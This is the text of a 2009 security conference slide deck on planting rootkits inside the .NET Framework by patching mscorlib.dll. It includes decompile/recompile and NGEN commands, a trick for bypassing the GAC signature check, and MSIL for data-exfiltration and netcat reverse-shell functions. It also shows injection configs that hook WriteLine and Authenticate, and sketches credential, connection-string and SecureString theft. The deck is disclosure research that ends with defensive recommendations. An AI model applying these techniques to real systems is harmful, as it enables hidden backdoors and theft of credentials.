1. NET Framework Rootkits: Backdoors inside your Framework
Erez Metula,
Application Security Department Manager,
Security Software Engineer, 2BSecure
April 17, 2009

2. Agenda Introduction to .NET execution model
Tampering with programming language implementation
Deploying malware inside the Framework
Malicious code injection
Automating the process with .NET-Sploit
Attack scenarios
Q & A

3. Why focusing on .NET Framework?
Advanced mainstream development platform, on the rise
Job trends (indeed.com) Computer books trends (O’Reilly)
Able to run several languages (c#, c++, vb.net, etc.)
Installed on almost every windows machine
Available on other OS (project mono) - linux , solaris, mac, etc..
Execution model similar to other platforms (such as java)
לכתוב מאיפה הציטוטים

4. Overview of .NET execution model
High level code is compiled to MSIL (CIL)
The CLR generates native code on the fly
JIT (Just-In-Time)
It uses BCL library code

5. BCL (Base Class Library)
Shared among all .NET languages
Classes for IO, threading, database, text, graphics, console, sockets, web, security, cryptography, COM, etc…

6. MSIL (Microsoft intermediate Language)
Pseudo-assembly, Object “aware” intermediate language. Some instructions:
Add, mul, call, ret
Stloc – Store stack value into local variable
Ldstr - loads a string on the stack
Newobj, throw, catch
All calls are stack-based
Also known an CIL

7. Is it possible to change a programming language?
Example - Changing WriteLine(string s) implementation
Sample test application calling WriteLine
static void Main(string[] args) {
Console.WriteLine("Hello (crazy) World!"); }
Let’s make WriteLine(string s) to print every string twice

8. Modified WriteLine(s) MSIL code
Original code:
Original code of WriteLine:
Modified code:
Print #1 (same as before)
Print #2 (duplicate)
Modified code:

9. .NET application (Winform/Web)
static void Main(string[] args) {
Console.WriteLine("Hello (crazy) World!"); }
.Net Class Library
public void WriteLine ( string value )
{ //Framework’s implementation of WriteLine()
//low level code for printing
//low level code for printing (duplicate) }
public void WriteLine ( string value )
{ //Framework’s implementation of WriteLine()
//low level code for printing }
mscorlib.dll
User interface
Hello (crazy) World
Windows APIs and services

10. Why tampering the Framework?
An ideal, overlooked place for code hiding
Low level access to important methods
Large attack surface / success rate
Pre-installed (windows server 2003 and above)
Recommended update
Backdoors hidden from code review audits
Controlling all Framework applications
Object Oriented malware

11. Patching .NET Assemblies
2 options
Decompile, code edit, recompile
Direct binary (exe/dll) patching
Patching the Framework requires high privileges
Housekeeping / Post exploitation attacks
Insider threat

12. Tools
Filemon – locating which DLL’s are used and their location in the GAC
Reflector – analyzing the DLL code
Ilasm – compiling (MSIL -> DLL)
Ildasm – decompiling (DLL -> MSIL)
Text editor – modifying the MSIL code
Ngen - native compiler

13. Overview - Framework modification steps
Framework modification can generally be described by those steps
Locate the DLL in the GAC
Decompile it
ILDASM mscorlib.dll /OUT=mscorlib.dll.il /NOBAR /LINENUM /SOURCE
Modify the MSIL code
Recompile it
ILASM /DEBUG /DLL /QUIET /OUTPUT=mscorlib.dll mscorlib.dll.il
Force the Framework to use our patched DLL

14. Modifying the MSIL code
Possibilities
Add extra code
“Function injection”
Add hooking (pre / post)
Remove specific lines of code
Modify properties, values, etc..
Pay attention to
Line number recalculation
Stack size might grows

15. Code reuse - Function injection
Extend the Framework with new methods (“functions”)
Provide “malware API” to the payload code which uses it
Deploy once, use many times
Let’s take a look at 2 examples
Void SendToUrl(string url, string data)
Void ReverseShell(string ip, int32 port)
Will be used later on

16. SendToUrl(string url, string data)
Usage: transfer data from the victim machine to the attacker
Parameters:
url – the attacker’s collector page
data – the data to send
Data transfer is implemented as an innocent http web request

17. SendToUrl implementation
.method public hidebysig static void SendToUrl(string url,
string data) cil managed {
.maxstack 8
IL_0000: nop
IL_0001: ldarg.0
IL_0002: ldarg.1
IL_0003: call string System.String::Concat(string,string)
IL_0008: call class [System]System.Net.WebRequest [System]System.Net.WebRequest::Create(string)
IL_000d: callvirt instance class [System]System.Net.WebResponse [System]System.Net.WebRequest::GetResponse()
IL_0012: pop
IL_0013: ret }

18. ReverseShell(string ip, int32 port)
Usage: open reverse shell to the ip,port
Parameters”
ip – the attacker’s address
port – the attacker’s listening port

19. ReverseShell implementation
SendToUrl MSIL Code (omitted):
.method public hidebysig static void ReverseShell(string ip, int32 port) cil managed {
.maxstack 3
.locals init ([0] string cmdfilename, [1] string filename, [2] uint8[] netcat, [3] class System.IO.BinaryWriter binWriter1,[4] uint8[] cmd, [5] class System.IO.BinaryWriter binWriter2,[6] string arguments,
[7] class [System]System.Diagnostics.Process proc, [8] object[] CS$0$0000)
IL_0000: nop
IL_0001: ldstr "cmd.exe"
IL_0006: stloc.0
IL_0007: ldstr "netcat.exe"
IL_000c: stloc.1 …
IL_0101: pop
IL_0102: ret
} // end of method ::ReverseShell

20. Deploying the modified DLL
gacutil.exe is useless
Modified DLL has a different signature
Public key token - shortened id generated by the last 8 bytes of the SHA-1 hash of the RSA public key.
Example
mscorlib.dll - b77a5c561934e089
Replacing the signing keys is one option.

21. Manipulating the Loader
The loader can be manipulated
Public key token (signature) as a file mapper
Example:
c:\WINDOWS\assembly\GAC_32\mscorlib\ __b77a5c561934e089\
Naive loading - It loads a DLL from a GAC directory with same name
No signatures are checked

22. Reverting back from NGEN Native DLL
NGEN is in our way!
JIT optimizer - Compiles .NET assemblies into native code
A cached NGEN’ed version is used
Solution - Disable/Refresh the old DLL
Example:
ngen uninstall mscorlib
Enable it again using our modified DLL

23. Automating the process with .NET-Sploit
A general purpose .NET binary modification tool
Able to perform all previous steps
Modify a given function
Inject payloads (pre/post injection modes)
Execute payloads
Generate deployers
Easy to extend by writing new modules

24. .NET-Sploit modules concept
Concept inspired from H.D. Moore’s amazing “metasploit” exploit platform.
Generic modules concept
Function – a new method
Payload – injected code
Reference – external DLL reference
Item – injection descriptor
Comes with a set of predefined modules

25. Item example Target DLL Location New Function New Code
<CodeChangeItem name="Send data to URL">
<Description>call SendToUrl from inside WriteLine()</Description>
<AssemblyName> mscorlib.dll </AssemblyName>
<AssemblyLocation>c:\WINDOWS\assembly\GAC_32\mscorlib\ __b77a5c561934e089
</AssemblyLocation>
<AssemblyFunc>
<FileName> SendToUrl_generic.func </FileName>
<Location><![CDATA[} // end of class System.Object]]></Location>
<BeforeLocation>TRUE</BeforeLocation>
</AssemblyFunc>
<AssemblyCode>
<FileName> SendStringPOC.payload </FileName>
<Location><![CDATA[ instance void WriteLine() cil managed ]]></Location>
<StackSize>8</StackSize>
<InjectionMode> Append </InjectionMode>
</AssemblyCode>
</CodeChangeItem>
Target DLL Location
New Function
DEMO – if time permits???????
New Code

26. <CodeChangeItem name="print every string twice">
<Description>print every string twice</Description>
<AssemblyName>mscorlib.dll</AssemblyName>
<AssemblyLocation>c:\WINDOWS\assembly\GAC_32\mscorlib\ __b77a5c561934e089</AssemblyLocation>
<AssemblyCode>
<FileName>writeline_twice.payload</FileName>
<Location><![CDATA[.method public hidebysig static void WriteLine(string 'value') cil managed]]></Location>
<StackSize>8</StackSize>
<InjectionMode>Post Append</InjectionMode>
</AssemblyCode>
</CodeChangeItem>

27. COPY - Item example <CodeChangeItem name="print twice">
<Description>change WriteLine() to print every string twice</Description>
<AssemblyName> mscorlib.dll </AssemblyName>
<AssemblyLocation>c:\WINDOWS\assembly\GAC_32\mscorlib\ __b77a5c561934e089
</AssemblyLocation>
<AssemblyCode>
<FileName> writeline_twice</FileName>
<Location>
<![CDATA[ instance void WriteLine() cil managed]]>
</Location>
<StackSize>8</StackSize>
<InjectionMode> Append </InjectionMode>
</AssemblyCode>
</CodeChangeItem>
Target
Location
Injected Code
Hooking point
DEMO – if time permits???????
Mode

28. .NET Framework Rootkits
Things you can do with it
API Hooking
Code manipulation
Resource hiding (file,process,port…)
Covert Channels / reverse shells
Proxy (bouncer)
Backdoors
Polymorphism attacks

29. Important places Classes Class Security.Cryptography
Class Reflection.MemberInfo
Class Security.SecureString
Class TextReader
Methods
FormsAuthentication::Authenticate()
Forms.Application::Run()
SqlConnection::Open()
DNS::GetHostAddresses()
CodeAccessPermission::Demand()

30. Some examples of logic manipulation
Sensitive data theft
Authentication Backdoors
Reverse shells
DNS fixation
Crypto attacks
Permanent HTML/JS injection
Disabling security mechanisms

31. Form credential stealing
Authenticate() is used by all applications performing authentication
Send the credentials to the attacker:
Original code (end of authenticate)
Modified code(post injection)
Post injected

32. DEMO

33. Authentication backdoors
Conditional authentication bypass
Example – if password is “MagicValue”
Backdooring .NET’s Authenticate() method

34. Reverse shell
Call ReverseShell() from any method to create the connection
Example – connect when Run() is called
To , port 1234
Original code
Modified code (pre injection)
Pre injection

35. Stealing connection strings
SqlConnection::Open() is responsible for opening DB connection
“ConnectionString” variable contains the data
Open() is called, ConnectionString is initialized
Send the connection string to the attacker
public override void Open() {
SendToUrl(“ this.ConnectionString);
//original code starts here … }
לדבר בקצרה

36. DNS fixation Fixate Dns.GetHostAddresses() return IP address
Affects ALL .NET’s network API methods
Payload: fixate_specific_ip_to_function_argument_0.payload
Item: Fixate DNS response to specific ip.item
DEMO (if time permits) – Using .NET-Sploit

37. Crypto attacks Tampering with Cryptography libraries Some scenarios:
False sense of security
Some scenarios:
Key fixation and manipulation
Key stealing
Algorithm downgrade
example – encryption key fixation:
Modified

38. Permanent HTML/JS injection
Tamper with internal HTML/JS generated by the Framework
Inject permanent code into code templates
Persistent XSS
Man-in-the-Middle
Defacement
Browser exploitation framework (xss-shell)

39. SecureString stealing
In-memory encrypted string for sensitive data usage
Probably contains valuable data !
Example - send this data to the attacker:
IntPtr ptr = System.Runtime.InteropServices.Marshal.SecureStringToBSTR(secureString);
SendToUrl(“
System.Runtime.InteropServices.Marshal.PtrToStringBSTR(ptr));

40. Disabling security mechanisms
CAS (Code Access Security) is responsible for runtime code authorizations
Security logic manipulation
CodeAccessPermission::Demand()
FileIOPermission, RegistryPermission, etc.
Applications will not behave according to CAS policy settings
It seems like the app is restricted while it’s not

41. Things to consider when injecting
Pre / Post consideration
Places to inject your code
Object Oriented and inheritance
References to assemblies
Stack size usually grows
File size changes
Removing traces with NGEN

42. Malware development scenarios
Changing a language class libraries can lead to some very interesting attacks
Deploy many types of malicious software
Backdoors
Rootkits
Viruses
Spyware
Worms
Etc..

43. Call for action AV vendors – Block Framework tampering attempts
Microsoft – Raise the bar. It’s too low!
Code obfuscation
Kernel level protection
IT - File tampering detectors (ex: tripwire)
Auditors/testers – know about this malware hiding place
Forensics – look for evidence inside the Framework
Developers – your app is secure as the underlying framework
End users – be aware of this kind of stuff!

44. …And what about other platforms?
The concept can be applied to all VM platforms
Application virtual machines (short list)
.NET (CLR)
Java Virtual Machine (JVM)
Dalvik virtual machine (Google Android)
PHP (Zend Engine)
Flash Player / AIR - ActionScript Virtual Machine (AVM)
SQLite virtual machine (VDBE)
Perl virtual machine

45. Java? An example for another platform Some minor differences
Library location (java lib directory)
Packging (jar)
Signature mechanism (jar signing)
Java can be manipulated the same way
DEMO - If time permits…
Tampering with The JRE Runtime (rt.jar)

46. References
Ken Thompson, C compiler backdoors “Reflections on Trusting Trust”
Dinis Cruz, “the dangers of full trust applications”
MATERIAL
Whitepaper, .NET-Sploit Tool, Source code
More information can be obtained at

47. Summary Modification of the framework is easy
Malicious code can be hidden inside it
Can lead to some very interesting attacks
It does not depend on specific vulnerability
It is not restricted only to .NET

48. Questions ?

49. Thank you !